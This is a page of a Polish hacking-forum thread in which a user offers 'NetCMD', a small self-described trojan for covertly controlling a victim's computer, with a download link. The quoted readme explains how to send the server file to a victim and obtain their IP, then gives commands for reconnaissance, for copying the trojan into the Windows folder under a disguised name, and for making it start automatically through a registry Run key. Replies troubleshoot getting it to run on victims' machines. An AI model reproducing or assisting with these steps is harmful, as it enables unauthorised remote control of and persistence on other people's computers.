Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 20

Temat: NetCMD

  1. #1
    Zarejestrowany
    Oct 2007
    Postów
    17

    Lightbulb NetCMD

    Witam Was! Zapraszam do oceny mojego najnowszego dzieła

    A mianowicie NetCMD


    Jego zaletą jest rozmiar: 8,5 kb - klient i 8,5 kb - serwer.


    Można go pobrać stąd: http://www.sendspace.com/file/ltls5c (po ok. 5 sekundach na kole pojawi się link do pobrania).

    Oczekuje wszelkich komentarzy, uwag i propozycji!


    Tutaj cytat z pliku ReadMe.txt jako opis:
    Witaj w pliku ReadMe programu NetCMD.

    Autor: Amidamaru.

    Oczekuje wszelakich komentarzy, uwag i propozycji! Mój mail: [email protected]



    PROGRAM STWORZONY DO CELÓW EDUKACYJNYCH.







    1. O plikach
    __________________________________________________ __________________________________________________ ________



    Program jest bardzo prostym programem do zdalnego zarządzania komputerem, bez świadomości drugiej strony - czyli poprostu trojanem

    NIEOTWIERAJ PLIKU srv.exe ! Jest to plik dla ofiary!
    Plik cli.exe natomiast służy do zdalnego sterowania.


    Największą zaletą programu jest pojemność:
    - plik srv.exe ma 8,5 kb
    - plik cli.exe ma też 8,5 kb
    Po spakowaniu razem mają 12,9 kb.

    Przede wszystkim uzyskano taki wynik poprzez:
    - Spakowanie pliku srv.ex oraz cli.exe programem UPX w najlepszej możliwej kompresji
    - Spakowanie obu plików do archiwum RAR-a (pliki.rar) o najwyższym stopniu kompresji

    Po dokładnym przeczytaniu pliku ReadMe.txt (czyli tego) i doshelp.txt możesz posługiwać się samym archiwum pliki.rar.

    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










    2. Zaczynamy!
    __________________________________________________ __________________________________________________ ________


    Program nie wymaga żadnej konfiguracji. Działa na stałym porcie i ma jednolitne ustawienia.
    Aby więc zacząć musisz tylko podesłać ofiarze plik srv.exe i poznać jej IP (np. poprzez Gadu-Gadu).
    Następnie odpalasz u siebie plik cli.exe. W pole IP: wpisujesz oczywiście IP ofiary i klikasz Enter.
    Czekasz na połączenie.
    Gdy zostaniesz połączony możesz już wykonywać zdalnie komendy na komputerze ofiary!

    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_










    3. Podstawy
    __________________________________________________ __________________________________________________ ________

    Od razu powiem, że program nie jest dla lamerów, którzy uważają się za wielkich haksi0rów :/ Nie ma tu żadnych fajnych zabaweczek. Czysta linia komend. Jednak bardziej doświadczeni zapewne wiedzą, że przez CMD można zrobić praktycznie WSZYSTKO!

    Moja propozycja jak zacząć wygląda tak:
    a) wpisjemy systeminfo, aby zobaczyć co w kompie gra
    b) wpisujemy net user, a potem net user Administrator, aby zorientować się jakie posiada konta oraz czy Administrator ma hasło i czy można je zmienić
    c) teraz proste copy "ścieżka_trojana" "C:\Windows\jakas_fajna_nazwa.exe", żeby skopiować naszego trojanika do folderu Windowsa
    d) czas dodać trojana do autostartu. Uzyskamy to za pomocą edytora rejestru pod CMD, wpisujemy: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NazwaWAutostarcie /t REG_SZ /d C:\Windows\NazwaPodJakaSkopiowalismyTrojana.exe

    Po tych czynnościach jesteśmy niejako "zabezpieczeni" i możemy kontynuować...


    Proszę przed wyłączeniem programu wpisać w linię komen ofiary polecenie exit !! (Inaczej proces CMD.EXE nie zostanie zakończony)
    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_









    4. Postanowienia końcowe
    __________________________________________________ __________________________________________________ ________

    Pamiętaj, że mogę być problemy z połączeniem jeżeli ofiara:
    - znajduje się za NAT-em
    - posiada firewall (nawet czasem Windowsowy blokuje)
    - posiada antywirua z bardzo wysokim stopniem filtracji (może wykryć, że program był kompresowany, co czasami zostaje uznane za wirusa)

    Pamiętaj: używasz programu na własną odpowiedzialność

    Autor: AMIDAMARU.

    Licencja: freeware.
    -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_




    NetCMD



    Rozmiarówka:
    ReadMe.txt - 4,36 kb
    doshelp.txt - 16,1 kb
    pliki.rar - 12,9 kb
    cli.exe - 8,5 kb
    NetCMD.rar - 20,8 kb
    srv.exe - 8,5 kb

    Co o nim sądzicie...?

    Pozdrawiam!
    Ostatnio edytowane przez Amidamaru : 10-17-2007 - 15:43

  2. #2
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    rozmiar 22 kB, jestem pelen podziwu ze 'tylko' tyle piszac w delphi
    zrobiles prawie to czego ja nie potrafilem, chyba

    niestety nie moge go przetestowac:

    (przy obu plikach tak samo)

  3. #3
    Zarejestrowany
    Mar 2007
    Skąd
    toronto
    Postów
    283

    Domyślnie

    podejżewam, ze aplikacja dziala i wlasnie ja testujesz

  4. #4
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    obawiam sie ze nie, no chyba ze to taki wypasiony exploit ktory podpina sie pod pamiec procesow systemowych i maskuje swoje polaczenie.

  5. #5
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    Witam!

    Czy ktoś ma podobny problem jak 31337

    I czy działa Ci ta wersja, którą przesyłam w załączniku
    Załączone Pliki Załączone Pliki
    Ostatnio edytowane przez Amidamaru : 10-18-2007 - 10:32

  6. #6
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    tez nie dziala.
    wlasnie znalazlem info ze to brak frameworka
    good job! pisac trojany pod frameworka

  7. #7
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie



    Tak, racja!

    Aby mieć frameworka trzeba pobrać te dwa piki i je do #system# wrzucić (np. C:\Windows\system32):
    http://addenda.webtek.opole.pl/pliki/vcl70.zip
    http://addenda.webtek.opole.pl/pliki/rtl70.zip
    wtedy wszystkie programy pod framework śmigają

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    W takim razie wrzucajac to komus trzeba go poprosic o dogranie plikow :P
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #9
    Avatar Exc0mmunion
    Exc0mmunion jest offline Superion
    Zarejestrowany
    Feb 2007
    Postów
    182

    Domyślnie

    Albo skompilować z odpowiednią opcją (modułem) w delphi. Robiłem tak jak pisałem programy w tym języku, i problem znikał (powiększał sie rozmiar pliku wynikowego)

  10. #10
    Zarejestrowany
    Oct 2007
    Postów
    17

    Domyślnie

    Niee Chodzi o to, że specjalnie jest tak skompilowany... Niestety - jeżeli "ofiara" nie ma frameworka to musimy załączyć tamte pliki... Jednak większość osób posiada go wgranego i u nich malutki trojan będzie działał

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj